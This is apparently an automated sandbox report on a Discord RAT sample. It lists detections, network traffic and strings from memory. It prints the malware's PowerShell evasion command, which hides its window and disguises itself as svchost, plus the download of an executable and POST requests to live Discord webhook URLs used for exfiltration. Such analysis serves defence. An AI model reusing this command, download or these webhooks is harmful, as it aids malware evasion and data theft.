        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell -Command "$process = Get-Process -Id $pid; $process.ProcessorAffinity = 1; $process.PriorityClass = 'High'; $process.PriorityBoostEnabled = $true; Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class Win32 { [DllImport(\"user32.dll\")] public static extern bool SetWindowDisplayAffinity(IntPtr hWnd, uint dwAffinity); [DllImport(\"kernel32.dll\")] public static extern bool SetProcessWorkingSetSize(IntPtr proc, int min, int max); }'; [Win32]::SetWindowDisplayAffinity($process.MainWindowHandle, 0x11); [Win32]::SetProcessWorkingSetSize($process.Handle, -1, -1); $process.ProcessName = 'svchost'" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6712, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.cmdline", ProcessId: 6704, ProcessName: csc.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-06T13:37:33.646580+020020197142Potentially Bad Traffic192.168.2.864901185.199.108.153443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for dropped file
        Source: C:\Users\Public\Documents\Secret Document\exe.exeAvira: detection malicious, Label: TR/Agent.lsgui
        Multi AV Scanner detection for dropped file
        Source: C:\Users\Public\Documents\Secret Document\exe.exeReversingLabs: Detection: 70%
        Yara detected Discord Rat
        Source: Yara matchFile source: C:\Users\Public\Documents\Secret Document\exe.exe, type: DROPPED
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.6% probability
        Machine Learning detection for dropped file
        Source: C:\Users\Public\Documents\Secret Document\exe.exeJoe Sandbox ML: detected
        Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.8:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.8:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:64892 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:64897 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 185.199.108.153:443 -> 192.168.2.8:64901 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.128.233:443 -> 192.168.2.8:64913 version: TLS 1.2
        Source: Binary string: ws\dll\mscorlib.pdb source: powershell.exe, 00000014.00000002.2132008073.00000224BB954000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: softy.pdb9 source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb{ source: powershell.exe, 00000014.00000002.2136799854.00000224BBAF0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: tomation.pdb source: powershell.exe, 00000009.00000002.1493577612.000002699181D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1526310397.00000269ABB8D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2132008073.00000224BB8AE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000023.00000002.2673504080.000002D2E06EA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000014.00000002.2132008073.00000224BB880000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: n.pdb source: powershell.exe, 00000009.00000002.1526310397.00000269ABB99000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbu38 source: powershell.exe, 00000014.00000002.2132008073.00000224BB954000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32( source: powershell.exe, 00000014.00000002.1953599209.00000224A1939000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 6?ll\mscorlib.pdb source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: softy.pdb3 source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.pdb source: powershell.exe, 00000009.00000002.1496227351.0000026994FB9000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.pdbhPM source: powershell.exe, 00000009.00000002.1496227351.0000026994FB9000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbQ*V source: powershell.exe, 00000023.00000002.2656267224.000002D2E052C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \user\AppData\Local\Temp\l1mwkpcb\l1mwkpcb.pdbneAutomation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dllmands.Utility.dllt.dll source: powershell.exe, 00000009.00000002.1493577612.000002699181D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdbk source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: em.Core.pdb source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbi source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ion.pdb71 source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: *on.pdb source: powershell.exe, 00000009.00000002.1524477975.00000269AB862000.00000004.00000020.00020000.00000000.sdmp
        Source: global trafficHTTP traffic detected: GET /exe.exe HTTP/1.1Host: diva.inkConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
        Source: Joe Sandbox ViewIP Address: 162.159.128.233 162.159.128.233
        Source: Joe Sandbox ViewIP Address: 185.199.108.153 185.199.108.153
        Source: Joe Sandbox ViewIP Address: 185.199.108.153 185.199.108.153
        Source: Joe Sandbox ViewASN Name: FASTLYUS FASTLYUS
        Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.8:64901 -> 185.199.108.153:443
        Source: global trafficHTTP traffic detected: POST /api/webhooks/1291851445620047963/DdrKtNqFRSRXEVELOz3Obg6_LdIUNEiwcyGZbdN-1UiXnmNnz7ZMzVkKlapF0RrIhBjd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: ptb.discord.comContent-Length: 50Expect: 100-continueConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /exe.exe HTTP/1.1Host: diva.inkConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: discord.com
        Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
        Source: global trafficDNS traffic detected: DNS query: ptb.discord.com
        Source: global trafficDNS traffic detected: DNS query: api.msn.com
        Source: global trafficDNS traffic detected: DNS query: diva.ink
        Source: unknownHTTP traffic detected: POST /api/webhooks/1292044762974785547/-sVDk3ilu3WEM17kfI_edy7EuWfHE7f0bes056ngUTuZWTzgcxB9dhTgyQxwaVvv2Sgz HTTP/1.1Host: discord.comUser-Agent: curl/7.83.1Accept: */*Content-Type: application/jsonContent-Length: 47
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 06 Oct 2024 11:36:07 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2d2e4b4e83d711efbbb5069e833022f9; Expires=Fri, 05-Oct-2029 11:36:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1728214568x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YGklYx1d2cW8BhgkyRVfbOYioO2vcAIqF2jAmrfbgQ%2B2UkIwFApw7DcJAiHc4J6eu5ZqmbonDzDZEOHQXdTjyKnZrbUXYuAaPS7XyqtOxWKaV%2BUZ0MCGesKq2e9l"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2d2e4b4e83d711efbbb5069e833022f9cef3e9ced00fa7b64b4c1686e6ff1a63df6cc21685dcedc62ec80ba1cc5929de; Expires=Fri, 05-Oct-2029 11:36:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=b37bbe72c413031a900b56b1d31d11a902acd7e0-1728214567; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 06 Oct 2024 11:36:08 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=2e072e0a83d711ef8c1ba6b9cfeb62f1; Expires=Fri, 05-Oct-2029 11:36:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1728214569x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sOoC3SBezCg0nU%2BOEXHjKZMPd4R86nMK2v7QN9Pkdfjq21IFcLAifYU2D%2BnK0og1p%2FKSJQL2b0ZQdQ09N%2BWhw5avZO39PrnzuD%2BfH93z7osICy9a6h%2FmZP4jcTni"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=2e072e0a83d711ef8c1ba6b9cfeb62f149dd75b89a5720c855583c6a29207d0006d76d49577469e0cf5f2f0ca379ffa1; Expires=Fri, 05-Oct-2029 11:36:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=bb964afb29782512641559f220b160214513b907-1728214568; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 06 Oct 2024 11:37:28 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=5db2103e83d711efb9496aa08501a966; Expires=Fri, 05-Oct-2029 11:37:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1728214649x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LtjJdExVy97iaETFDYwF%2F7DxwZGf2Vm9Bpjw9FE3s3a114TFt%2BxXYNdNiRVrgkncYTVuXkLtFGihwfWwK7lMLkwLcCCQgQqodupcxuKxbzzYx3X6yZUyYnVfVuKOTAwSBw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=5db2103e83d711efb9496aa08501a9665f4224957175ab610e045a13edcb3f791b0e3e2b5c889874fe9ef19eba1a1711; Expires=Fri, 05-Oct-2029 11:37:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=4216abe66f60e6f26d03b5316b71ec33601d74bb-1728214648; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 06 Oct 2024 11:37:30 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=5f138d1883d711ef9a43b24ca2cdc774; Expires=Fri, 05-Oct-2029 11:37:30 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1728214652x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=19sInuO38Ar0dPAU27c3KDCtTqzB8lQk2%2FecDwtHb3Kpc6QhtSqbhu6RTGBXgn65K8opGlRi%2BPsDGdGtxRuiTcSqGjN6wQzsxCRXNtARTWY02wFf9uHr%2F3W0eS9DOn11yQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=5f138d1883d711ef9a43b24ca2cdc774fb28e2dbb8f9a4eb9da8c2268aeffa1bb73952ade3ca065bd126775ba035ce45; Expires=Fri, 05-Oct-2029 11:37:30 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=5c1c52db2546bb0b04da3053595ec57af65671bc-1728214650; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 06 Oct 2024 11:37:40 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=648e1e3e83d711efa1222e6bea697208; Expires=Fri, 05-Oct-2029 11:37:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1728214661x-ratelimit-reset-after: 1via: 1.1 googleCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DCWBk2%2FUnFbrwYkx1MryQh%2BIRQdTLum%2FZejWsAr6aiu3euwg1TXNnt33p8%2B2Fxlv68Hz4n56518HpsgA%2BTgJQ3yxaoMWIORbY9axWm2THY8PUanmVYnGmbvXuUzWavLtUw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=648e1e3e83d711efa1222e6bea69720871fa1048c683cd0b23181c93d19fe4facf90e24b0bfe98c28416ab86fcd5cb02; Expires=Fri, 05-Oct-2029 11:37:40 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=LaxSet-Cookie: __cfruid=3e1b35420a45e4990d8b0aa7548cd31247594e2b-1728214660; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneSet-Cookie: _cfuvi
        Source: explorer.exe, 00000017.00000002.2709660093.0000000008F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: powershell.exe, 00000009.00000002.1526310397.00000269ABB70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
        Source: svchost.exe, 00000019.00000002.2704857982.000001774DCCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
        Source: explorer.exe, 00000017.00000002.2709660093.0000000008F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: explorer.exe, 00000017.00000002.2709660093.0000000008F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: svchost.exe, 00000019.00000003.2260956832.000001774F0B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
        Source: powershell.exe, 00000009.00000002.1519896951.00000269A3822000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1519896951.00000269A36DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024781632000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.00000247901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1602787494.000002479006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640E430000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CC11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1718613317.000002641CADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC10A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1915213464.0000021AAC240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B38F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: explorer.exe, 00000017.00000002.2709660093.0000000008F54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: powershell.exe, 00000014.00000002.1961641784.00000224A3AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000023.00000002.2398128595.000002D2C9A75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ptb.discord.com
        Source: svchost.exe, 00000019.00000002.2704265023.000001774DCC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumera
        Source: powershell.exe, 00000009.00000002.1496227351.0000026993671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640CA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1789270547.0000021A9C091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1961641784.00000224A3881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2166565147.0000025C1B5CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 0000000E.00000002.1639610296.000002640DEEE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: powershell.exe, 00000014.00000002.1961641784.00000224A3AB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000015.00000002.2222057483.0000025C336DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
        Source: explorer.exe, 00000017.00000003.2339756407.000000000BC47000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.cot
        Source: powershell.exe, 00000009.00000002.1496227351.0000026993671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1543046653.0000024780001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1639610296.000002640CA61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1789270547.0000021A9C091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1961641784.00000224A3881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2166565147.0000025C1B5CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2166565147.0000025C1B59A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: explorer.exe, 00000017.00000003.2618054008.000000000913A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304478538.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000913A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/Io.
        Source: explorer.exe, 00000017.00000003.2618054008.000000000913A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304478538.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000913A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/uo
        Source: explorer.exe, 00000017.00000003.2305382655.00000000091C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000917D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306085985.00000000080B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 00000017.00000003.2618054008.000000000913A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304478538.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.000000000913B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2709660093.000000000913A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?Vm
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2705476793.00000000052BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 00000017.00000002.2709660093.0000000009128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2618054008.0000000009128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2304478538.0000000009128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2306435911.0000000009128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2328373122.0000000009128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
        Source: explorer.exe, 00000017.00000002.2707759232.0000000007F86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
        Source: powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000014.00000002.2116770833.00000224B3A2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: explorer.exe, 00000017.00000003.2304007048.0000000009148000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
        Source: powershell.exe, 00000009.00000002.1493410501.0000026991744000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1292044762974785547/-sVDk3
